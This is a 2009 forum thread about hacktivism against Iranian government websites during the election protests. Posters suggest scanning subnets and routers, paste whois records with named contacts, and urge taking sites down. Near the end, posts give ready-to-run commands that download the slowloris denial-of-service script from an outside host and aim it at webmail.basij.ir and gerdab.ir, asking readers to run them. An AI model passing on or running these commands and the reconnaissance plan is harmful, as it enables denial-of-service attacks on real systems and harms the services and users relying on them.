Customize

Hacktivism

Discussion in 'Iran' started by Leptok, Jun 16, 2009.

  1. port 80 and 443 are the webserver. port 21 seems to be filtered. no obvious holes.

    that webserver can easily be taken down by using slowloris.pl though.
  2. lets get serious

    Why hack webservers? Common people lets scan their subnet range and find more exotic servers housing more exotic features of the governement... I'm willing to bet they're on the same subnet...

    Someone with bandwidth pingsweep and find what host are alive and look for vuln services...

    Ahmadinejad.ir - 217.218.155.110
    leader.ir 62.220.121.130

    lets find core backbone routers... traceroutes, drop nameservers... if the governement doesn't want communication for the people then they shouldn't get communication either...
  3. Here is what I got when I ran a whois quary, with the ip-217.218.155.110


    10:17:09 PM, 06/20/2009, (GMT - 6:00)

    WhoIs results:

    Domain:
    217.218.155.110

    WhoIs server:
    whois.arin.net (192.149.252.44)


    OrgName: RIPE Network Coordination Centre
    OrgID: RIPE
    Address: P.O. Box 10096
    City: Amsterdam
    StateProv:
    PostalCode: 1001EB
    Country: NL

    ReferralServer: whois://whois.ripe.net:43

    NetRange: 217.0.0.0 - 217.255.255.255
    CIDR: 217.0.0.0/8
    NetName: 217-RIPE
    NetHandle: NET-217-0-0-0-1
    Parent:
    NetType: Allocated to RIPE NCC
    NameServer: NS-PRI.RIPE.NET
    NameServer: NS3.NIC.FR
    NameServer: SUNIC.SUNET.SE
    NameServer: SNS-PB.ISC.ORG
    NameServer: SEC1.APNIC.NET
    NameServer: SEC3.APNIC.NET
    NameServer: TINNIE.ARIN.NET
    Comment: These addresses have been further assigned to users in
    Comment: the RIPE NCC region. Contact information can be found in
    Comment: the RIPE database at Query the RIPE Database
    RegDate: 2000-06-05
    Updated: 2009-03-25

    # ARIN WHOIS database, last updated 2009-06-20 19:21
    # Enter ? for additional hints on searching ARIN's WHOIS database.
  4. Then after quaring at that site i got this, not sure if it helps any.



    Query the RIPE Database
    Search for
    Switch to the RIPE TEST Database

    % This is the RIPE Database query service.
    % The objects are in RPSL format.
    %
    % The RIPE Database is subject to Terms and Conditions.
    % See http://www.ripe.net/db/support/db-terms-conditions.pdf

    % Note: This output has been filtered.
    % To receive output for a database update, use the "-B" flag.

    % Information related to '217.218.0.0 - 217.218.191.0'

    inetnum: 217.218.0.0 - 217.218.191.0
    netname: Area-6
    descr: Area no 6 partition
    country: IR
    admin-c: HA1537-RIPE
    tech-c: ZD144-RIPE
    status: LIR-PARTITIONED PA "status:" definitions
    mnt-by: AS12880-MNT
    mnt-lower: AS12880-MNT
    source: RIPE # Filtered

    person: Hamid Alipour
    address: Information Technology Company (ITC)
    address: P.O.Box 16315-737.
    address: Tehran
    address: Iran
    phone: +98 21 84803400
    fax-no: +98 21 84803453
    e-mail: abuse@mail.dci.co.ir
    e-mail: soc@dci.ir
    nic-hdl: HA1537-RIPE
    mnt-by: AS12880-mnt
    source: RIPE # Filtered

    person: Zahra Deliri
    address: Datacommunications Company of Iran
    address: DCI
    address: No 2.1 Yazdanpanah st.Vali Asr Av.
    address: Tehran
    address: Iran
    phone: +98 21 8790652
    fax-no: +98 21 8790030
    nic-hdl: ZD144-RIPE
    remarks: Technical Contact Person
    remarks: Please for any abuse report write to abuse@mail.dci.co.ir
    mnt-by: AS12880-mnt
    source: RIPE # Filtered

    % Information related to '217.218.0.0/15AS12880'

    route: 217.218.0.0/15
    descr: DCI-Route
    origin: AS12880
    mnt-by: AS12880-MNT
    source: RIPE # Filtered

    % Information related to '217.218.128.0/18AS12880'

    route: 217.218.128.0/18
    descr: DCI-Route
    origin: AS12880
    mnt-by: AS12880-MNT
    source: RIPE # Filtered

    % Information related to '217.218.128.0/17AS12880'

    route: 217.218.128.0/17
    descr: DCI-Route
    origin: AS12880
    mnt-by: AS12880-MNT
    source: RIPE # Filtered

    % Information related to '217.218.0.0/16AS12880'

    route: 217.218.0.0/16
    descr: DCI-Route
    origin: AS12880
    mnt-by: AS12880-MNT
    source: RIPE # Filtered

    % Information related to '217.218.128.0/19As12880'

    route: 217.218.128.0/19
    descr: DCI-Route
    origin: As12880
    mnt-by: AS12880-MNT
    source: RIPE # Filtered
  5. Twitter Account Hacked?

    This may sound paranoid but.........once I started sending Tweets that said things like, Basiji, you are cowards. You shoot unarmed and women. Lay down your arms. Murder or Freedom. Your choice.

    I sent Tweets like that for about 4 hours and I never once saw it come up at #iranelection. Before I started saying things like that, I would see my Tweets once in a while. Is it possible Iran gov't. disabled my Twitter account? Or did I just miss it?

    Thanks.
  6. Stop the ddos attacks

    You MAY want to pay attention to this post... I can fully see the logic in his/her post and would recommend the same!
  7. _----_

    dont forget Press TV
    a fu**ing piece of sh*t News agency
    n farsnews.com
    a main website for spreading bullshit
  8. It's good to know what bullshit they are spreading, because it gives you a clue at what they are worried about the most.
  9. To see your tweet you need to include the tag of course.
    Ex: "Die you scum sucking Basiji#iranelection"
  10. spritrig Member

    Change content of Supreme Leader's website.

    Can the content of the Supreme leader's website be modified to include photos of the dead, and videos of the dying next to the photos of the supreme leader.
  11. Redon ballet

    Maybe you should have paid attention instead. They're already saying that it's all the westerners fault. DDOS or not.
    No one gives a shit what they say. They want censorship - they get closed pools.
  12. I always put several tags, #iranelection #Tehran #Iran #Mousavi #gr88

    I was seeing my tweets every once in a while before I started posting about Basiji. I posted about them for about 4 hours and realized I was not seeing those Tweets. So I wondered if my account was hacked.



  13. Geraldanthro Member

    Chinese internet shut down by simple DDoS attack

    Chinese internet shut down by simple DDoS attack

    Well, a large portion of it anyway. A DDoS attack on one domain server created a cascade reaction that left five provinces struggling to get online:

    This is what happened during the DNSPod incident, however, it triggered a chain of unexpected events, which led to network congestions for the carrier networks. DNSPods servers happen to be used by Baofeng, a highly popular Chinese video streaming service. Once the millions Baofeng users fired up their desktop application, all the requests bounced off on the ISP servers, which did not know how to process them.

    The intense traffic on the high-level servers caused bottlenecks, slowing everyones Internet connection down to a crawl. In addition to the users in the five aforementioned provinces, who were severely affected, customers in Henan, Anhui and Gansu have also reportedly experienced problems.

    SOURCE:
    http://www.thedarkvisitor.com/
    Site seems to be down???



    g
  14. This. Most of their shit is under constant attack. woop woop no stoppin us nao
  15. The protesters should try to take control of "Voice Of Justice", assuming the station is in Iran, I've heard it on 9495 AM in North America.
  16. ^^^THIS!

    They have a communications infrastructure whch is vital to their operations. If anything were to be accomplished by hacking, it would be an attack against them.

    Trying to DDOS a pro-regime web site will accomplish nothing.
  17. bso.ir contact email: ermia.gh@gmail.com
  18. Geraldanthro Member

    Strange their contact email would be Gmail?
    When they run their own email server in Iran??

    G
  19. bwahahaha - funny

    google bso.ir.

    their site comes up as "HACKED BY KAMY4r." That may have happened a long time ago - dunno cause the site is inacessible now.
  20. Lebanon-IRAN Member

  21. three simple commands...

    wget http://ha.ckers.org/slowloris/slowloris.pl

    chmod +x slowloris.pl

    ./slowloris.pl -dns webmail.basij.ir -port 80 -timeout 1000 -num 500 -tcpto 5 -httpready
  22. posted too soon

    Scratch that, gerdab.ir is back up - that's the site where the Basij posted up photos of protesters in order to ID and arrest them. Please help bring it back down, we had it down most of the day, the command you should run is:

    ./slowloris.pl -dns gerdab.ir -port 80 -timeout 1000 -num 500 -tcpto 5 -httpready
  23. FYI the offending page: ?????????? ?? ??????? ????

Share This Page

Customize Theme Colors

Close

Choose a color via Color picker or click the predefined style names!

Primary Color :

Secondary Color :
Predefined Skins